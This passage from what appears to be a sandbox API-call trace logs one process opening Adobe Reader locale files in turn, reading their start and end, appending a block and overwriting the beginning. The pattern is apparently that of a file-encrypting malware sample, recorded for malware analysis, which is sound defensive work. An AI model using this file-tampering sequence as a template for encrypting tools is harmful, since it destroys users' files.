dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xea [0079.300] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.300] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.301] ReleaseMutex (hMutex=0x168) returned 1 [0079.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7358c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0079.301] ReadFile (in: hFile=0x1fc, lpBuffer=0x26beaf8, nNumberOfBytesToRead=0xea, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26beaf8*, lpNumberOfBytesRead=0x2b1f2bc*=0xea, lpOverlapped=0x0) returned 1 [0079.302] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0079.302] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x672, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2b1f2d0*=0x672, lpOverlapped=0x0) returned 1 [0079.303] CloseHandle (hObject=0x1fc) returned 1 [0079.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\BRdlang32.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\brdlang32.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0079.304] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.304] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3800 [0079.305] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.305] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.305] ReleaseMutex (hMutex=0x168) returned 1 [0079.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.RUM", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.RUM", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.RUM", lpUsedDefaultChar=0x0) returned 13 [0079.305] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.316] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2800 [0079.316] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.317] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2800 [0079.318] WriteFile (in: hFile=0x1fc, lpBuffer=0x2669698*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.318] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0079.318] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e955a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.318] CloseHandle (hObject=0x1fc) returned 1 [0079.319] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Multimedia.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\multimedia.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0079.319] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.320] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x13a00 [0079.320] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.320] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.320] ReleaseMutex (hMutex=0x168) returned 1 [0079.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.RUM", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.RUM", cchWideChar=14, lpMultiByteStr=0x1f7342c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.RUM", lpUsedDefaultChar=0x0) returned 14 [0079.321] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.364] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12a00 [0079.364] ReadFile (in: hFile=0x1fc, lpBuffer=0x2669698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.552] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12a00 [0079.552] WriteFile (in: hFile=0x1fc, lpBuffer=0x2669698*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.552] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0079.552] WriteFile (in: hFile=0x1fc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.553] CloseHandle (hObject=0x1fc) returned 1 [0079.812] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\SendMail.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\sendmail.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.813] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.813] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4000 [0079.813] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.813] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.814] ReleaseMutex (hMutex=0x168) returned 1 [0079.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.RUM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.RUM", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.RUM", lpUsedDefaultChar=0x0) returned 12 [0079.814] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.829] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3000 [0079.832] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.832] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3000 [0079.834] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.835] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0079.835] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.835] CloseHandle (hObject=0x1e8) returned 1 [0079.836] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\AdobeCollabSync.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\adobecollabsync.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0079.849] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.849] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0079.849] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.849] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.850] ReleaseMutex (hMutex=0x168) returned 1 [0079.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.RUS", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0079.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.RUS", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.RUS", lpUsedDefaultChar=0x0) returned 19 [0079.850] ReadFile (in: hFile=0x1fc, lpBuffer=0x2664868, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2664868*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0080.993] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0080.993] WriteFile (in: hFile=0x1fc, lpBuffer=0x26692f8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26692f8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0080.994] CloseHandle (hObject=0x1fc) returned 1 [0080.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\IA32.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\ia32.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.000] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.000] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe00 [0081.000] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.000] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.000] ReleaseMutex (hMutex=0x168) returned 1 [0081.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.RUS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0081.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.RUS", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.RUS", lpUsedDefaultChar=0x0) returned 8 [0081.001] ReadFile (in: hFile=0x1fc, lpBuffer=0x25ae0a8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25ae0a8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0081.013] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0081.013] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0081.014] CloseHandle (hObject=0x1fc) returned 1 [0081.014] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\SaveAsRTF.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\saveasrtf.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.015] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.015] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4a00 [0081.015] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.015] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.015] ReleaseMutex (hMutex=0x168) returned 1 [0081.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.RUS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.RUS", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.RUS", lpUsedDefaultChar=0x0) returned 13 [0081.015] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2668898*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.018] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3a00 [0081.019] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2668898*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.019] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3a00 [0081.019] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.019] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.020] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668898*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668898*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.020] CloseHandle (hObject=0x1fc) returned 1 [0081.020] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\accessibility.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\accessibility.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.020] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.021] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xaa00 [0081.021] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.021] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.021] ReleaseMutex (hMutex=0x168) returned 1 [0081.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.SKY", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.SKY", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.SKY", lpUsedDefaultChar=0x0) returned 17 [0081.021] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.023] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x9a00 [0081.023] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2668898*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x9a00 [0081.065] WriteFile (in: hFile=0x1fc, lpBuffer=0x25aa0a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa0a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.065] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.066] WriteFile (in: hFile=0x1fc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.066] CloseHandle (hObject=0x1fc) returned 1 [0081.066] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\eBook.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\ebook.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.067] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.067] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0081.067] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.067] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.067] ReleaseMutex (hMutex=0x168) returned 1 [0081.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.SKY", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.SKY", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.SKY", lpUsedDefaultChar=0x0) returned 9 [0081.068] ReadFile (in: hFile=0x1fc, lpBuffer=0x2667898, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0081.070] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0081.071] WriteFile (in: hFile=0x1fc, lpBuffer=0x2691bb8*, 